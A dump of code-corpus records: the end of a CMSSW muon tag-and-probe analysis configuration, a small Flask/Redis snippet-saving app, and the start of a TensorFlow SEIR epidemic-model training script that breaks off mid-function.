1.' # !!! \n )\n\nprocess.combCaliso = selectedLayer1Muons.clone(src = 'comb', \n cut = 'caloIso < 5.' # !!!\n )\n\nprocess.combReliso = selectedLayer1Muons.clone(src = 'comb', \n cut = '(trackIso+caloIso)/pt < 0.05' # !!! \n )\n\nprocess.combTrkisoEcal = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'ecalIsoDeposit.candEnergy < 4' \n )\n\nprocess.combTrkisoHcal = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'hcalIsoDeposit.candEnergy < 6' \n )\n\nprocess.combTrkisoCaliso = selectedLayer1Muons.clone(src = 'combTrkiso', \n cut = 'caloIso < 5.' \n )\n\n\n\n\n\nprocess.trackMuEcalHcalTrkiso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = 'trackIso < 1.'\n )\n\nprocess.trackMuEcalHcalCaliso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = 'caloIso < 5.'\n )\n\nprocess.trackMuEcalHcalReliso = selectedLayer1Muons.clone(src = 'trackMuEcalHcal', \n cut = '(trackIso+caloIso)/pt < 0.05'\n )\n\n\n\n\n\n\nprocess.cutFlowProbeTest = cms.Sequence(process.comb +\n process.combValhit +\n process.combChi2 +\n process.combTrksig +\n process.combValhitChi2Trksig +\n\n process.trackMuEcal +\n process.trackMuHcal +\n process.trackMuEcalHcal +\n process.trackMuTrkiso +\n process.trackMuCaliso +\n process.trackMuReliso +\n\n\n process.trackMuEcalHcalTrkiso +\n process.trackMuEcalHcalCaliso +\n process.trackMuEcalHcalReliso +\n \n process.combEcal +\n process.combHcal +\n process.combEcalHcal +\n process.combEcalHcalTrkiso +\n process.combEcalHcalCaliso +\n process.combEcalHcalReliso +\n\n\n\n process.combTrkiso +\n process.combCaliso +\n process.combReliso +\n process.combTrkisoEcal +\n process.combTrkisoHcal +\n process.combTrkisoCaliso \n \n ) \n\n\n## ---\n## tagAndProbeAnalyzer\n## ---\n\n\nprocess.load(\"TopAnalysis.TopAnalyzer.TagAndProbeAnalyzer_cfi\")\n\n\n\nprocess.comb_combValhit = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combValhit\" , jets = \"jetsCF2\" )\nprocess.comb_combChi2 = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combChi2\" , jets = \"jetsCF2\" )\nprocess.comb_combTrksig = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combTrksig\" , jets = \"jetsCF2\" )\nprocess.comb_combTrackMu = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combValhitChi2Trksig\" , jets = \"jetsCF2\" )\nprocess.comb_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combEcal\" , jets = \"jetsCF2\" )\nprocess.comb_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combHcal\" , jets = \"jetsCF2\" )\nprocess.comb_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"combEcalHcal\" , jets = \"jetsCF2\" )\nprocess.comb_combTrackMuEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"comb\", tests = \"trackMuEcalHcal\" , jets = \"jetsCF2\" )\n\n\nprocess.trackMu_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuEcal\" , jets = \"jetsCF2\" )\nprocess.trackMu_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuHcal\" , jets = \"jetsCF2\" )\nprocess.trackMu_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuEcalHcal\", jets = \"jetsCF2\" )\nprocess.trackMu_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuTrkiso\" , jets = \"jetsCF2\" )\nprocess.trackMu_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuCaliso\" , jets = \"jetsCF2\" )\nprocess.trackMu_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"combValhitChi2Trksig\", tests = \"trackMuReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.combEcalHcal_trackMu = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"trackMuEcalHcal\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"combEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"combEcalHcalCaliso\" , jets = \"jetsCF2\" )\nprocess.combEcalHcal_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"combEcalHcal\", tests = \"combEcalHcalReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.trackMuEcalHcal_combTrkiso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.trackMuEcalHcal_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalCaliso\" , jets = \"jetsCF2\" )\nprocess.trackMuEcalHcal_combReliso = process.tagAndProbeAnalyzer.clone(probes = \"trackMuEcalHcal\", tests = \"trackMuEcalHcalReliso\" , jets = \"jetsCF2\" )\n\n\nprocess.combTrkiso_trackMu = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"trackMuTrkiso\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combEcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoEcal\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combHcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoHcal\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combEcalHcal = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combEcalHcalTrkiso\" , jets = \"jetsCF2\" )\nprocess.combTrkiso_combCaliso = process.tagAndProbeAnalyzer.clone(probes = \"combTrkiso\", tests = \"combTrkisoCaliso\" , jets = \"jetsCF2\" )\n\n\n\n\nprocess.probeTestAnalysis = cms.Sequence(process.comb_combValhit +\n process.comb_combChi2 +\n process.comb_combTrksig +\n process.comb_combTrackMu +\n process.comb_combEcal +\n process.comb_combHcal +\n process.comb_combEcalHcal +\n process.comb_combTrackMuEcalHcal +\n\n process.trackMu_combEcal +\n process.trackMu_combHcal +\n process.trackMu_combEcalHcal +\n process.trackMu_combTrkiso +\n process.trackMu_combCaliso +\n process.trackMu_combReliso +\n\n process.combEcalHcal_trackMu + \n process.combEcalHcal_combTrkiso +\n process.combEcalHcal_combCaliso +\n process.combEcalHcal_combReliso +\n\n process.trackMuEcalHcal_combTrkiso +\n process.trackMuEcalHcal_combCaliso +\n process.trackMuEcalHcal_combReliso +\n\n process.combTrkiso_trackMu +\n process.combTrkiso_combEcal +\n process.combTrkiso_combHcal +\n process.combTrkiso_combEcalHcal +\n process.combTrkiso_combCaliso \n )\n\n\n\nprocess.comb_combValhit_2 = process.comb_combValhit.clone() \nprocess.comb_combChi2_2 = process.comb_combChi2.clone() \nprocess.comb_combTrksig_2 = process.comb_combTrksig.clone() \nprocess.comb_combTrackMu_2 = process.comb_combTrackMu.clone() \nprocess.comb_combEcal_2 = process.comb_combEcal.clone() \nprocess.comb_combHcal_2 = process.comb_combHcal.clone() \nprocess.comb_combEcalHcal_2 = process.comb_combEcalHcal.clone() \n\n\nprocess.trackMu_combEcal_2 = process.trackMu_combEcal.clone()\nprocess.trackMu_combHcal_2 = process.trackMu_combHcal.clone()\nprocess.trackMu_combEcalHcal_2 = process.trackMu_combEcalHcal.clone()\nprocess.trackMu_combTrkiso_2 = process.trackMu_combTrkiso.clone()\nprocess.trackMu_combCaliso_2 = process.trackMu_combCaliso.clone()\nprocess.trackMu_combReliso_2 = process.trackMu_combReliso.clone()\n\nprocess.combEcalHcal_trackMu_2 = process.combEcalHcal_trackMu.clone() \nprocess.combEcalHcal_combTrkiso_2 = process.combEcalHcal_combTrkiso.clone()\nprocess.combEcalHcal_combCaliso_2 = process.combEcalHcal_combCaliso.clone()\nprocess.combEcalHcal_combReliso_2 = process.combEcalHcal_combReliso.clone()\n\nprocess.trackMuEcalHcal_combTrkiso_2 = process.trackMuEcalHcal_combTrkiso.clone()\nprocess.trackMuEcalHcal_combCaliso_2 = process.trackMuEcalHcal_combCaliso.clone()\nprocess.trackMuEcalHcal_combReliso_2 = process.trackMuEcalHcal_combReliso.clone()\n\nprocess.combTrkiso_trackMu_2 = process.combTrkiso_trackMu.clone()\nprocess.combTrkiso_combEcal_2 = process.combTrkiso_combEcal.clone()\nprocess.combTrkiso_combHcal_2 = process.combTrkiso_combHcal.clone()\nprocess.combTrkiso_combEcalHcal_2 = process.combTrkiso_combEcalHcal.clone()\nprocess.combTrkiso_combCaliso_2 = process.combTrkiso_combCaliso.clone()\n\n\n\nprocess.probeTestAnalysis_2 = cms.Sequence(\n\n process.comb_combValhit_2 +\n process.comb_combChi2_2 +\n process.comb_combTrksig_2 +\n process.comb_combTrackMu_2 +\n process.comb_combEcal_2 +\n process.comb_combHcal_2 +\n process.comb_combEcalHcal_2 + \n\n process.trackMu_combEcal_2 +\n process.trackMu_combHcal_2 +\n process.trackMu_combEcalHcal_2 +\n process.trackMu_combTrkiso_2 +\n process.trackMu_combCaliso_2 +\n process.trackMu_combReliso_2 +\n\n process.combEcalHcal_trackMu_2 + \n process.combEcalHcal_combTrkiso_2 +\n process.combEcalHcal_combCaliso_2 +\n process.combEcalHcal_combReliso_2 +\n\n process.trackMuEcalHcal_combTrkiso_2 +\n process.trackMuEcalHcal_combCaliso_2 +\n process.trackMuEcalHcal_combReliso_2 +\n\n process.combTrkiso_trackMu_2 +\n process.combTrkiso_combEcal_2 +\n process.combTrkiso_combHcal_2 +\n process.combTrkiso_combEcalHcal_2 +\n process.combTrkiso_combCaliso_2 \n )\n\n\n\n\n\nprocess.comb_combValhit_3 = process.comb_combValhit.clone() \nprocess.comb_combChi2_3 = process.comb_combChi2.clone() \nprocess.comb_combTrksig_3 = process.comb_combTrksig.clone() \nprocess.comb_combTrackMu_3 = process.comb_combTrackMu.clone() \nprocess.comb_combEcal_3 = process.comb_combEcal.clone() \nprocess.comb_combHcal_3 = process.comb_combHcal.clone() \nprocess.comb_combEcalHcal_3 = process.comb_combEcalHcal.clone() \n\n\nprocess.trackMu_combEcal_3 = process.trackMu_combEcal.clone()\nprocess.trackMu_combHcal_3 = process.trackMu_combHcal.clone()\nprocess.trackMu_combEcalHcal_3 = process.trackMu_combEcalHcal.clone()\nprocess.trackMu_combTrkiso_3 = process.trackMu_combTrkiso.clone()\nprocess.trackMu_combCaliso_3 = process.trackMu_combCaliso.clone()\nprocess.trackMu_combReliso_3 = process.trackMu_combReliso.clone()\n\nprocess.combEcalHcal_trackMu_3 = process.combEcalHcal_trackMu.clone() \nprocess.combEcalHcal_combTrkiso_3 = process.combEcalHcal_combTrkiso.clone()\nprocess.combEcalHcal_combCaliso_3 = process.combEcalHcal_combCaliso.clone()\nprocess.combEcalHcal_combReliso_3 = process.combEcalHcal_combReliso.clone()\n\nprocess.trackMuEcalHcal_combTrkiso_3 = process.trackMuEcalHcal_combTrkiso.clone()\nprocess.trackMuEcalHcal_combCaliso_3 = process.trackMuEcalHcal_combCaliso.clone()\nprocess.trackMuEcalHcal_combReliso_3 = process.trackMuEcalHcal_combReliso.clone()\n\nprocess.combTrkiso_trackMu_3 = process.combTrkiso_trackMu.clone()\nprocess.combTrkiso_combEcal_3 = process.combTrkiso_combEcal.clone()\nprocess.combTrkiso_combHcal_3 = process.combTrkiso_combHcal.clone()\nprocess.combTrkiso_combEcalHcal_3 = process.combTrkiso_combEcalHcal.clone()\nprocess.combTrkiso_combCaliso_3 = process.combTrkiso_combCaliso.clone()\n\n\nprocess.probeTestAnalysis_3 = cms.Sequence(\n\n process.comb_combValhit_3 +\n process.comb_combChi2_3 +\n process.comb_combTrksig_3 +\n process.comb_combTrackMu_3 +\n process.comb_combEcal_3 +\n process.comb_combHcal_3 +\n process.comb_combEcalHcal_3 + \n\n process.trackMu_combEcal_3 +\n process.trackMu_combHcal_3 +\n process.trackMu_combEcalHcal_3 +\n process.trackMu_combTrkiso_3 +\n process.trackMu_combCaliso_3 +\n process.trackMu_combReliso_3 +\n\n process.combEcalHcal_trackMu_3 + \n process.combEcalHcal_combTrkiso_3 +\n process.combEcalHcal_combCaliso_3 +\n process.combEcalHcal_combReliso_3 +\n\n process.trackMuEcalHcal_combTrkiso_3 +\n process.trackMuEcalHcal_combCaliso_3 +\n process.trackMuEcalHcal_combReliso_3 +\n\n process.combTrkiso_trackMu_3 +\n process.combTrkiso_combEcal_3 +\n process.combTrkiso_combHcal_3 +\n process.combTrkiso_combEcalHcal_3 +\n process.combTrkiso_combCaliso_3 \n )\n\n\n\n \n\n## ---\n## muon quality analyzer\n## ---\nprocess.load(\"TopAnalysis.TopAnalyzer.MuonQuality_cfi\")\n\n## 1. leading muon with standAlone restriction\nprocess.muonID_1st_CF1StAl = process.analyzeMuonQuality.clone(src='muonCF1StAl')\n\n\n\n## ---\n## run the final sequence\n## ---\nprocess.p1 = cms.Path(## do the gen event selection (decay channel)\n process.genFilterSequence *\n ## the trigger selection (hltEle15)\n process.recFilterSequence *\n\n \n ## get corresponding electron collection\n process.idOnlyElectrons *\n process.centralElectrons *\n process.highPtElectrons *\n process.tightElectrons *\n process.electronCF2 *\n process.electronCF3 *\n \n ## do the electron monitoring\n process.monitorElectronKinematics *\n process.monitorElectronQuality *\n\n\n ## do the electron event selection\n ##process.electronSelection *\n process.elecSelIdPtEta *\n process.elecSelRelIso *\n\n \n ## get corresponding jet collections\n process.reliableJets *\n process.centralJets *\n process.goodJets *\n process.jetsCF1 *\n process.jetsCF2 *\n process.bJetsCF2 *\n process.lightQJetsCF2 *\n process.jetsCF3HighPur *\n process.jetsCF3HighEff *\n\n ## do the jet monitoring\n process.monitorJetKinematics *\n process.monitorJetQuality *\n\n\n ## do the jet event selection\n ##process.jetSelection1 *\n ##process.jetSelection2 *\n process.jetSelPtEtaEmf *\n process.jetSelBtag *\n\n\n process.analyzeMETKinematics *\n ## missing ET selection\n process.selectedLayer1MET *\n process.selectEventsWithMET *\n\n \n ## get corresponding muon collection\n process.muonCF0 *\n process.muonCF1StAl *\n process.muonCF1Comb * \n\n ## do the muon monitoring\n process.muonKin *\n process.muonID *\n\n\n ## CUT FLOW (from below because of application in muon selection)\n process.cutFlowProbeTest *\n\n\n ## do the muon event selection\n process.muonSelStAl *\n process.muonSelComb *\n\n #process.muonSelTrkiso *\n process.muonSelReliso *\n #process.muonSelCaliso *\n\n\n\n ## END of TAG !!! !!!!!\n\n\n \n ##process.muonSelEcalHcal *\n ##process.muonSelTrackMu *\n \n \n\n ## electron monitoring aac (after all cuts) \n process.monitorElectronKinematics_aac *\n process.monitorElectronQuality_aac *\n\n ## jet monitoring aac\n process.monitorJetKinematics_aac *\n process.monitorJetQuality_aac *\n\n ## muon monitoring aac\n process.muonKin_aac *\n process.muonID_aac *\n\n ## remains of muon event selection\n ## process.muonSelComb *\n\n\n ## probeTest analysis\n\n\n ## CUT FLOW (above)\n \n\n ## tagAndProbeAnalyzer \n process.probeTestAnalysis *\n\n\n ## further muon event selection for statistics\n ##process.muonSelTrackMu\n\n process.muonSelValhit *\n process.muonSelChi2 *\n process.muonSelTrksig *\n\n\n ## further muon event selection\n process.muonSelEcalHcal *\n\n\n process.probeTestAnalysis_2 *\n\n\n ## single-muon trigger, threshold pt > 9 GeV, no isolation requirements\n process.hltMu9 *\n\n ## 2nd tagAndProbeAnalyzer\n process.probeTestAnalysis_3 \n \n ## test of top decay channels \n #process.topDecayChannelDQM + \n #process.dqmSaver\n \n )\n","sub_path":"Configuration/analysis/fullLeptonic/analyzeFullLeptonicSelection_dilepSelecActive_cfg.py","file_name":"analyzeFullLeptonicSelection_dilepSelecActive_cfg.py","file_ext":"py","file_size_in_byte":71770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"241302070","text":"import uuid\nimport os\nimport redis\n\nfrom flask import Flask, render_template, abort, request, jsonify\n\napp = Flask(__name__)\nr = redis.StrictRedis.from_url(os.environ['REDIS_URL'], decode_responses=True)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", examples=load_examples())\n\n\n@app.route(\"/examples//\")\ndef get_example(name):\n try:\n return jsonify(code=render_template(\"examples/{}.txt\".format(name)))\n except:\n abort(404)\n\n\n@app.route(\"/load//\")\ndef list_custom(id):\n return jsonify(names=r.hkeys(id))\n\n\n@app.route(\"/load///\")\ndef load_custom(id, name):\n return jsonify(code=r.hget(id, name))\n\n\n@app.route('/save/', methods=['POST'])\n@app.route('/save//', methods=['POST'])\ndef save(id=None):\n if id is None:\n id = uuid.uuid4()\n code = request.get_json()['code']\n for l in code.splitlines():\n if l.startswith('name:'):\n name = l[5:].strip()\n break\n r.hset(id, name, code)\n return jsonify(id=id, name=name)\n\n\ndef load_examples():\n path = os.path.join(\"templates\", \"examples\")\n for f in os.listdir(path):\n with open(os.path.join(path, f), 'r') as fd:\n for l in fd.readlines():\n if l.startswith('name:'):\n filename, _ = os.path.splitext(f)\n yield {'name': l[5:].strip(), 'filename': filename}\n break\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"tms.py","file_name":"tms.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477382395","text":"\"\"\"\r\n@author: LXA\r\nBenchmark Code of SEIR model\r\n2020-11-13\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport platform\r\nimport shutil\r\nimport DNN_base\r\nimport RNN_tools\r\nimport RNN_data\r\nimport plotData\r\nimport saveData\r\n\r\n\r\n# 记录字典中的一些设置\r\ndef dictionary_out2file(R_dic, log_fileout):\r\n RNN_tools.log_string('Equation name for problem: %s\\n' % (R_dic['eqs_name']), log_fileout)\r\n RNN_tools.log_string('Network model of solving problem: %s\\n' % str(R_dic['model']), log_fileout)\r\n RNN_tools.log_string('activate function: %s\\n' % str(R_dic['act_name']), log_fileout)\r\n RNN_tools.log_string('hidden layers: %s\\n' % str(R_dic['hidden_layers']), log_fileout)\r\n RNN_tools.log_string('Init learning rate: %s\\n' % str(R_dic['learning_rate']), log_fileout)\r\n RNN_tools.log_string('Decay to learning rate: %s\\n' % str(R_dic['lr_decay']), log_fileout)\r\n RNN_tools.log_string('The type for Loss function: %s\\n' % str(R_dic['loss_function']), log_fileout)\r\n if (R_dic['optimizer_name']).title() == 'Adam':\r\n RNN_tools.log_string('optimizer:%s\\n' % str(R_dic['optimizer_name']), log_fileout)\r\n else:\r\n RNN_tools.log_string('optimizer:%s with momentum=%f\\n' % (R_dic['optimizer_name'], R_dic['momentum']),\r\n log_fileout)\r\n\r\n if R_dic['activate_stop'] != 0:\r\n RNN_tools.log_string('activate the stop_step and given_step= %s\\n' % str(R_dic['max_epoch']), log_fileout)\r\n else:\r\n RNN_tools.log_string('no activate the stop_step and given_step = default: %s\\n' % str(R_dic['max_epoch']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string(\r\n 'Initial penalty for difference of predict and true: %s\\n' % str(R_dic['init_penalty2predict_true']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('The model of regular weights and biases: %s\\n' % str(R_dic['regular_weight_model']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('Regularization parameter for weights and biases: %s\\n' % str(R_dic['regular_weight']),\r\n log_fileout)\r\n\r\n RNN_tools.log_string('Size 2 training set: %s\\n' % str(R_dic['size2train']), log_fileout)\r\n\r\n RNN_tools.log_string('Batch-size 2 training: %s\\n' % str(R_dic['batch_size2train']), log_fileout)\r\n\r\n RNN_tools.log_string('Batch-size 2 testing: %s\\n' % str(R_dic['batch_size2test']), log_fileout)\r\n\r\n\r\ndef print_and_log2train(i_epoch, run_time, tmp_lr, temp_penalty_nt, penalty_wb2s, penalty_wb2e, penalty_wb2i, penalty_wb2r,\r\n loss_s, loss_e, loss_i, loss_r, loss_n, log_out=None):\r\n print('train epoch: %d, time: %.3f' % (i_epoch, run_time))\r\n print('learning rate: %f' % tmp_lr)\r\n print('penalty for difference of predict and true : %f' % temp_penalty_nt)\r\n print('penalty weights and biases for S: %f' % penalty_wb2s)\r\n print('penalty weights and biases for S: %f' % penalty_wb2e)\r\n print('penalty weights and biases for I: %f' % penalty_wb2i)\r\n print('penalty weights and biases for R: %f' % penalty_wb2r)\r\n print('loss for S: %.10f' % loss_s)\r\n print('loss for E: %.10f' % loss_e)\r\n print('loss for I: %.10f' % loss_i)\r\n print('loss for R: %.10f' % loss_r)\r\n print('total loss: %.10f\\n' % loss_n)\r\n\r\n RNN_tools.log_string('train epoch: %d,time: %.3f' % (i_epoch, run_time), log_out)\r\n RNN_tools.log_string('learning rate: %f' % tmp_lr, log_out)\r\n RNN_tools.log_string('penalty for difference of predict and true : %f' % temp_penalty_nt, log_out)\r\n RNN_tools.log_string('penalty weights and biases for S: %f' % penalty_wb2s, log_out)\r\n RNN_tools.log_string('penalty weights and biases for S: %f' % penalty_wb2e, log_out)\r\n RNN_tools.log_string('penalty weights and biases for I: %f' % penalty_wb2i, log_out)\r\n RNN_tools.log_string('penalty weights and biases for R: %f' % penalty_wb2r, log_out)\r\n RNN_tools.log_string('loss for S: %.10f' % loss_s, log_out)\r\n RNN_tools.log_string('loss for E: %.10f' % loss_e, log_out)\r\n RNN_tools.log_string('loss for I: %.10f' % loss_i, log_out)\r\n RNN_tools.log_string('loss for R: %.10f' % loss_r, log_out)\r\n RNN_tools.log_string('total loss: %.10f' % loss_n, log_out)\r\n\r\n\r\ndef solve_SEIR2COVID(R):\r\n log_out_path = R['FolderName'] # 将路径从字典 R 中提取出来\r\n if not os.path.exists(log_out_path): # 判断路径是否已经存在\r\n os.mkdir(log_out_path) # 无 log_out_path 路径,创建一个 log_out_path 路径\r\n log_fileout = open(os.path.join(log_out_path, 'log_train.txt'), 'w') # 在这个路径下创建并打开一个可写的 log_train.txt文件\r\n dictionary_out2file(R, log_fileout)\r\n\r\n trainSet_szie = R['size2train']\r\n train_size2batch = R['batch_size2train']\r\n test_size2batch = R['batch_size2test']\r\n pt_penalty_init = R['init_penalty2predict_true'] # Regularization parameter for difference of predict and true\r\n wb_penalty = R['regular_weight'] # Regularization parameter for weights\r\n lr_decay = R['lr_decay']\r\n learning_rate = R['learning_rate']\r\n act_func = R['act_name']\r\n\r\n input_dim = R['input_dim']\r\n out_dim = R['output_dim']\r\n\r\n flag2S = 'WB2S'\r\n flag2E = 'WB2E'\r\n flag2I = 'WB2I'\r\n flag2R = 'WB2R'\r\n hidden_layers = R['hidden_layers']\r\n Weight2S, Bias2S = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2S)\r\n Weight2E, Bias2E = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2E)\r\n Weight2I, Bias2I = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2I)\r\n Weight2R, Bias2R = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2R)\r\n\r\n flag2alpha = 'WB2alpha'\r\n flag2beta = 'WB2beta'\r\n flag2gamma = 'WB2gamma'\r\n Weight2alpha, Bias2alpha = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2alpha)\r\n Weight2beta, Bias2beta = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2beta)\r\n Weight2gamma, Bias2gamma = DNN_base.initialize_NN_random_normal2(input_dim, out_dim, hidden_layers, flag2gamma)\r\n\r\n global_steps = tf.Variable(0, trainable=False)\r\n with tf.device('/gpu:%s' % (R['gpuNo'])):\r\n with tf.variable_scope('vscope', reuse=tf.AUTO_REUSE):\r\n T_it = tf.placeholder(tf.float32, name='T_it', shape=[None, out_dim])\r\n I_observe = tf.placeholder(tf.float32, name='I_observe', shape=[None, out_dim])\r\n N_observe = tf.placeholder(tf.float32, name='N_observe', shape=[None, out_dim])\r\n predict_true_penalty = tf.placeholder_with_default(input=1e3, shape=[], name='bd_p')\r\n in_learning_rate = tf.placeholder_with_default(input=1e-5, shape=[], name='lr')\r\n # in_alpha = tf.placeholder_with_default(input=1e-5, shape=[], name='beta')\r\n # in_beta = tf.placeholder_with_default(input=1e-5, shape=[], name='beta')\r\n # in_gamma = tf.placeholder_with_default(input=1e-5, shape=[], name='lr')\r\n train_opt = tf.placeholder_with_default(input=True, shape=[], name='train_opt')\r\n if 'PDE_DNN' == str.upper(R['model']):\r\n S_NN = DNN_base.PDE_DNN(T_it, Weight2S, Bias2S, hidden_layers, activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func)\r\n elif 'PDE_DNN_Fourier' == R['model']:\r\n S_NN = DNN_base.PDE_DNN(T_it, Weight2S, Bias2S, hidden_layers, activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func)\r\n elif 'PDE_DNN_BN' == str.upper(R['model']):\r\n S_NN = DNN_base.PDE_DNN_BN(T_it, Weight2S, Bias2S, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n E_NN = DNN_base.PDE_DNN_BN(T_it, Weight2E, Bias2E, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n I_NN = DNN_base.PDE_DNN_BN(T_it, Weight2I, Bias2I, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n R_NN = DNN_base.PDE_DNN_BN(T_it, Weight2R, Bias2R, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_alpha = DNN_base.PDE_DNN_BN(T_it, Weight2alpha, Bias2alpha, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_beta = DNN_base.PDE_DNN_BN(T_it, Weight2beta, Bias2beta, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n in_gamma = DNN_base.PDE_DNN_BN(T_it, Weight2gamma, Bias2gamma, hidden_layers, activate_name=act_func, is_training=train_opt)\r\n elif 'PDE_DNN_SCALEOUT' == str.upper(R['model']):\r\n freq = np.concatenate(([1], np.arange(1, 20)*10), axis=0)\r\n S_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2S, Bias2S, hidden_layers, freq, activate_name=act_func)\r\n E_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2E, Bias2E, hidden_layers, freq, activate_name=act_func)\r\n I_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2I, Bias2I, hidden_layers, freq, activate_name=act_func)\r\n R_NN = DNN_base.PDE_DNN_scaleOut(T_it, Weight2R, Bias2R, hidden_layers, freq, activate_name=act_func)\r\n in_alpha = DNN_base.PDE_DNN_scaleOut(T_it, Weight2alpha, Bias2alpha, hidden_layers, freq, activate_name=act_func)\r\n in_beta = DNN_base.PDE_DNN_scaleOut(T_it, Weight2beta, Bias2beta, hidden_layers, freq, activate_name=act_func)\r\n in_gamma = DNN_base.PDE_DNN_scaleOut(T_it, Weight2gamma, Bias2gamma, hidden_layers, freq, activate_name=act_func)\r\n\r\n alpha = tf.exp(in_alpha)\r\n beta = tf.exp(in_beta)\r\n gamma = tf.exp(in_gamma)\r\n\r\n S_NN = DNN_base.gauss(S_NN)\r\n E_NN = DNN_base.gauss(E_NN)\r\n I_NN = DNN_base.gauss(I_NN)\r\n R_NN = DNN_base.gauss(R_NN)\r\n\r\n N_NN = S_NN + E_NN + I_NN + R_NN\r\n\r\n dS_NN2t = tf.gradients(S_NN, T_it)[0]\r\n dE_NN2t = tf.gradients(E_NN, T_it)[0]\r\n dI_NN2t = tf.gradients(I_NN, T_it)[0]\r\n dR_NN2t = tf.gradients(R_NN, T_it)[0]\r\n dN_NN2t = tf.gradients(N_NN, T_it)[0]\r\n\r\n temp_snn2t = -(beta * tf.multiply(S_NN, I_NN))/N_NN # / :无论多少维的tensor,都是对于最终的每个元素都除的\r\n temp_enn2t = beta*tf.multiply(S_NN, I_NN) - alpha * E_NN\r\n temp_inn2t = alpha * E_NN - gamma * I_NN\r\n 